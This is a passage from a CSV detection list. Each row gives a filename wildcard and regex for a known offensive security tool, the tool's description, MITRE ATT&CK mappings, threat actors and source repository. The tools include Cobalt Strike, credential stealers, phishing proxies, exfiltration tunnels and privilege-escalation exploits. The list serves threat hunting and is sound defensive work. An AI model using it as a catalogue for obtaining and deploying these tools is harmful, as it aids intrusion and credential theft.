Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","N/A","10","10","903","142","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z","8572"
"*/loadercrypt_*.php*",".{0,1000}\/loadercrypt_.{0,1000}\.php.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","8573"
"*/LoaderMemoryModule_x64_Release.exe*",".{0,1000}\/LoaderMemoryModule_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","8574"
"*/LoadLibrary_x64_Release.exe*",".{0,1000}\/LoadLibrary_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","8575"
"*/local_execution_linux.exe*",".{0,1000}\/local_execution_linux\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","8576"
"*/local_exploit_suggester*",".{0,1000}\/local_exploit_suggester.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","#linux","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","8577"
"*/local_map.exe*",".{0,1000}\/local_map\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","8578"
"*/local_thread_hijacking.exe*",".{0,1000}\/local_thread_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","8579"
"*/LocalAdminSharp.git*",".{0,1000}\/LocalAdminSharp\.git.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","8580"
"*/LocalAdminSharp.sln*",".{0,1000}\/LocalAdminSharp\.sln.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","1","N/A","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","8581"
"*/localbrute.ps1*",".{0,1000}\/localbrute\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","1","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","8582"
"*/localbrute-extra-mini.ps1*",".{0,1000}\/localbrute\-extra\-mini\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Credential Access","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","1","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","8583"
"*/local-exploits/master/CVE*",".{0,1000}\/local\-exploits\/master\/CVE.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8584"
"*/LocalPotato.git*",".{0,1000}\/LocalPotato\.git.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","8585"
"*/LocalPrivEsc/*",".{0,1000}\/LocalPrivEsc\/.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","8586"
"*/localroot/2.6.x/elflbl*",".{0,1000}\/localroot\/2\.6\.x\/elflbl.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8587"
"*/localroot/2.6.x/h00lyshit*",".{0,1000}\/localroot\/2\.6\.x\/h00lyshit.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8588"
"*/LocalShellExtParse.git*",".{0,1000}\/LocalShellExtParse\.git.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","1","N/A","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","8589"
"*/LocalShellExtParse.py*",".{0,1000}\/LocalShellExtParse\.py.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","1","N/A","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","8590"
"*/localtonet.dll*",".{0,1000}\/localtonet\.dll.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","1","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","8591"
"*/localtonet.exe*",".{0,1000}\/localtonet\.exe.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","1","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","8592"
"*/localtonet.git*",".{0,1000}\/localtonet\.git.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","1","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","8593"
"*/localtonet.service*",".{0,1000}\/localtonet\.service.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","#linux","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","8594"
"*/localtonet-win*",".{0,1000}\/localtonet\-win.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","1","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","8595"
"*/LockLess.exe*",".{0,1000}\/LockLess\.exe.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","1","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","8601"
"*/LockLess.exe*",".{0,1000}\/LockLess\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","8602"
"*/LockLess.exe*",".{0,1000}\/LockLess\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","8603"
"*/Lockless.git*",".{0,1000}\/Lockless\.git.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","1","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","8604"
"*/Locksmith.git*",".{0,1000}\/Locksmith\.git.{0,1000}","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","N/A","8","10","1086","100","2025-04-21T12:43:50Z","2022-04-28T01:37:32Z","8605"
"*/log_file_timestamps.json*",".{0,1000}\/log_file_timestamps\.json.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","8609"
"*/log4shell.py*",".{0,1000}\/log4shell\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","8610"
"*/login/e1837f4d-1d0c-49b8-a242-8f653226c137*",".{0,1000}\/login\/e1837f4d\-1d0c\-49b8\-a242\-8f653226c137.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","8611"
"*/login_scanner*",".{0,1000}\/login_scanner.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8612"
"*/loginAAD.ps1*",".{0,1000}\/loginAAD\.ps1.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","8613"
"*/login-securite/DonPAPI*",".{0,1000}\/login\-securite\/DonPAPI.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","8614"
"*/logon_backdoor.git*",".{0,1000}\/logon_backdoor\.git.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","8615"
"*/logonuifox.dll*",".{0,1000}\/logonuifox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","1","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","8616"
"*/logs/*/becon_*.log",".{0,1000}\/logs\/.{0,1000}\/becon_.{0,1000}\.log","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","#logfile #linux","N/A","10","10","150","35","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z","8617"
"*/logs/beacon_log*",".{0,1000}\/logs\/beacon_log.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","8618"
"*/logs/empire_server.log*",".{0,1000}\/logs\/empire_server\.log.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","8619"
"*/lolbin.exe*",".{0,1000}\/lolbin\.exe.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","8620"
"*/lolminer.exe*",".{0,1000}\/lolminer\.exe.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","8621"
"*/lolMiner_v*_Win64.zip*",".{0,1000}\/lolMiner_v.{0,1000}_Win64\.zip.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","8622"
"*/lolMinerGUI.exe*",".{0,1000}\/lolMinerGUI\.exe.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","8623"
"*/LOLSpoof.git*",".{0,1000}\/LOLSpoof\.git.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","8624"
"*/LOLSpoof.nim*",".{0,1000}\/LOLSpoof\.nim.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","8625"
"*/LOLSpoof/releases/download/*",".{0,1000}\/LOLSpoof\/releases\/download\/.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","8626"
"*/lookupsid.py*",".{0,1000}\/lookupsid\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8627"
"*/lookupsid.py*",".{0,1000}\/lookupsid\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8628"
"*/LooneyPwner.git*",".{0,1000}\/LooneyPwner\.git.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","1","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","8629"
